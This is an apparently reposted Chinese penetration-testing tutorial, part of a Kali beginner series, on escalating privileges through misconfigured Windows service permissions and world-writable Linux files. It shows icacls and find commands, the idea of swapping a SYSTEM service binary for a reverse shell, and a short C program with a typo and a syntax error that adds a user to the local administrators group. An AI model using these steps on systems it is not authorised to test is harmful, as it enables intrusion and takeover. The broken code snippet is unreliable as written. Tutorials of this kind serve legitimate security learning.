小白日记25:kali渗透测试之提权(五)--利用配置不当提权
来源:互联网 发布:手机怎么成为网络歌手 编辑:程序博客网 时间:2024/06/11 12:43
利用配置不当提权
与漏洞提权相比,更常见的方法。在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵。当入侵一台服务器后,无法照当相应的补丁进行提权,可通过寻找是否存在配置不当进行提权。如:代码中没有进行参数过滤等操作。
- 通过查看哪些服务默认以system权限启动,可尝试将其替换或绑定反弹shell程序
- 了解NTFS权限允许users修改删除本身,则可利用其配置不当,完成提权
XP
安装了其他软件,打开services.msc本地服务设置,查看该软件是否以本地系统权限启动
查看应用程序NTFS权限是否可以被普通用户更改【即可执行文件路径】
##但不能替换应用程序,以免被发现【默认情况下,普通用户对操作系统中所有文件都没有修改权限】
命令行下快速查找当前系统下所有exe、con、ini执行程序的NTFS信息
1、icacls【windows 2003以后的系统中包含的程序】
icacls c:\windows\*.exe /save perm /T【查询结果保存为文本文件】
通过文本文件查找字符串F;;;BU
kali上生成shellcode把当前用户添加到管理员组
#include <stdlib.h>int main(){ int i; i=system("net localgroup administarators a /add"); return 0'}i586-mingw32msvc-gcc -o admin.exe admin.c
使用commview小工具进行抓包
2、linux系统下查找权限设置不安全的程序
ls -l 【查找当前目录】
find / -perm 777 -exec ls -l {} \; 【/-perm 777 查找所有权限为777的文件;-exec 执行 ls -l ;\; find命令以其结束】
提权只是思路
#若渗透进去的是应用程序
·应用系统的配置文件
通过应用连接数据库的配置文件,发现其连接的服务账号
后台服务运行账号【有可能root账号运行web服务】
0 0
- 小白日记25:kali渗透测试之提权(五)--利用配置不当提权
- 小白日记24:kali渗透测试之提权(四)--利用漏洞提权
- 小白日记21:kali渗透测试之提权(一)--本地提权
- 小白日记22:kali渗透测试之提权(二)--抓包嗅探
- 小白日记23:kali渗透测试之提权(三)--WCE、fgdump、mimikatz
- 小白日记26:kali渗透测试之提权(六)--收集敏感信息,隐藏痕迹
- 小白日记6:kali渗透测试之被动信息收集(五)-Recon-ng
- 小白日记33:kali渗透测试之Web渗透-扫描工具-Burpsuite(一)
- 小白日记34:kali渗透测试之Web渗透-扫描工具-Burpsuite(二)
- 小白日记2:kali渗透测试之被动信息收集(一)
- 小白日记4:kali渗透测试之被动信息收集(三)--Shodan、Google
- 小白日记12:kali渗透测试之服务扫描(二)-SMB扫描
- 小白日记35:kali渗透测试之Web渗透-手动漏洞挖掘(一)-默认安装引发的漏洞
- 小白日记27:kali渗透测试之Web渗透-Http协议基础,WEB
- 小白日记28:kali渗透测试之Web渗透-扫描工具-Nikto
- 小白日记29:kali渗透测试之Web渗透-扫描工具-Vega
- 小白日记30:kali渗透测试之Web渗透-扫描工具-Skipfish
- 小白日记31:kali渗透测试之Web渗透-扫描工具-Arachni
- Leetcode-62. Unique Paths
- java编程思想 第十二章 通过异常处理错误
- kafka剖析
- 剑指Offer 23题 从上往下打印二叉树 Java版
- oracle分页查询
- 小白日记25:kali渗透测试之提权(五)--利用配置不当提权
- windows 7下GPT所识别的GUID
- scala筑基篇-03-for表达式
- 2016/10/6
- Android简单实现列表菜单--PopupMenu的简单使用。
- 什么是数据结构和算法
- dom4j解析xml
- VMWare workstation之网络环境搭建
- ovs的netdev, ofproto以及dpif etc.